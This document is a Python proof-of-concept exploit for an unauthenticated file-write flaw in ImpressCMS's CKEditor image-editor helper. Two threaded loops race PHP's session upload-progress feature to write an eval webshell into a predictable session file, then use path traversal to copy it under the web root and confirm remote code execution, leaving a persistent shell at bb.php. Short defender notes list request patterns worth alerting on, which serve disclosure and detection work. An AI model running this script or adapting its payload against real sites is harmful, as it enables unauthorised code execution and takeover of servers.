import sys
import string
import requests
from multiprocessing.dummy import Pool as ThreadPool
# Proof of concept for an unauthenticated file-write in the CKEditor
# image-editor helper (PATH below) of an ImpressCMS install. It needs two
# cooperating processes against the same target: mode "1" (runner1) keeps
# injecting PHP code into a known session file, mode "2" (runner2) keeps
# asking the helper to copy that session file under the web root and
# probes the result. Which mode runs is decided at the bottom of the file.
#
# Defender notes: the write primitive is PHP's session.upload_progress
# feature (a POST field named PHP_SESSION_UPLOAD_PROGRESS is recorded in
# the session file); the copy primitive is processImage.php accepting
# arbitrary ``origName``/``imageName`` values. Requests worth alerting on
# are multipart POSTs to PATH carrying '<?' in that field, and GETs to
# PATH whose ``origName`` contains traversal sequences or whose
# ``imageName`` points into the session directory.
if len(sys.argv)<3:
    print('python '+sys.argv[0]+' http://localhost 1')
    print('python '+sys.argv[0]+' http://localhost 2')
    exit()
HOST = sys.argv[1]  # base URL of the target, e.g. http://localhost
# Vulnerable endpoint: the image-editor helper under the CKEditor finder.
PATH = '/editors/CKeditor/ceditfinder/imageeditor/processImage.php'
# Fixed PHP session id. Every request below presents it, so the server
# reads and writes one predictable session file (path spelled out in runner2).
sess_name = 'letspwnimpressCMS'
headers = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=' + sess_name
}
# PHP snippet that runner1 gets written into the session file; runner1 pads
# it with an 'A' on each side.
payload = '<?=eval($_GET[a]);exit;//'
def runner1(i):
    """Writer half of the race: POST a file upload in a loop whose
    ``PHP_SESSION_UPLOAD_PROGRESS`` field carries ``payload``.

    With PHP's ``session.upload_progress`` feature enabled (it is on in a
    stock php.ini) the upload-progress record, including this field's
    value, is written into the session file belonging to the PHPSESSID
    sent in ``headers``. That is how the PHP tag in ``payload`` lands on
    disk for runner2 to copy.

    Args:
        i: thread index handed over by the pool; unused.

    Returns:
        Never — the loop has no exit condition. The response object ``r``
        is discarded on every iteration.
    """
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': 'A' + payload + 'A'
    }
    while 1:
        # /etc/hosts is just an always-present file to make the request a
        # genuine multipart upload; nothing else reads its content.
        fp = open('/etc/hosts', 'rb')
        r = requests.post(HOST+PATH, files={'f': fp}, data=data, headers=headers)
        fp.close()
def runner2(i):
    """Reader half of the race: keep asking processImage.php to ``save``
    the session file to a web-reachable path, then probe that path.

    ``imageName`` in ``url`` names the PHP session file runner1 is
    polluting; ``origName`` is a traversal string that resolves to
    ``uploads/aa.php`` under the web root (the ``.....///`` spelling
    presumably survives whatever normalisation the endpoint applies —
    TODO confirm against the handler). processImage.php is assumed to
    copy the former to the latter without validating either, so any
    moment in which the session file holds the payload yields a PHP file
    the web server will execute.

    The probe request calls aa.php with ``a=`` set to PHP that echoes a
    long numeric marker and copies aa.php to bb.php. Seeing the marker in
    the response proves execution; the script then prints where to look
    and exits the whole process.

    Args:
        i: thread index handed over by the pool; unused.

    Returns:
        Never returns normally; terminates the process via ``exit()`` on
        success. ``filename`` is computed but never used — the session
        path is inlined in ``url`` — and ``c`` is read but not inspected.
    """
    filename = '/var/lib/php/sessions/sess_' + sess_name
    while 1:
        url = HOST+PATH+'?origName=.....///.....///.....///.....///uploads/aa.php&imageName=/var/lib/php/sessions/sess_letspwnimpressCMS&action=save'
        r = requests.get(url, headers=headers)
        c = r.content  # response body is not inspected
        url2 = requests.get(HOST+'/uploads/aa.php?a=echo%20%2799999999999999999999999999999%27;copy(%27aa.php%27,%27bb.php%27);')
        if('99999999999999999999999999999' in url2.text):
            print('[+] done!')
            print('[!] Check '+HOST+'/uploads/bb.php?a=phpinfo();')
            exit()
# Mode selection: argv[2] == '1' runs the writer loop, anything else the
# reader loop. Both halves have to run at the same time for the race to
# be won, hence the two usage lines printed above.
if sys.argv[2] == '1':
    runner = runner1
else:
    runner = runner2
# 32 threads all executing the same endless loop, to keep the target busy
# and widen the race window. Neither runner ever returns, so map_async
# only completes by exit() in runner2 or when .get()'s 0xffff-second
# timeout raises multiprocessing.TimeoutError; ``result`` is never a
# useful value.
pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)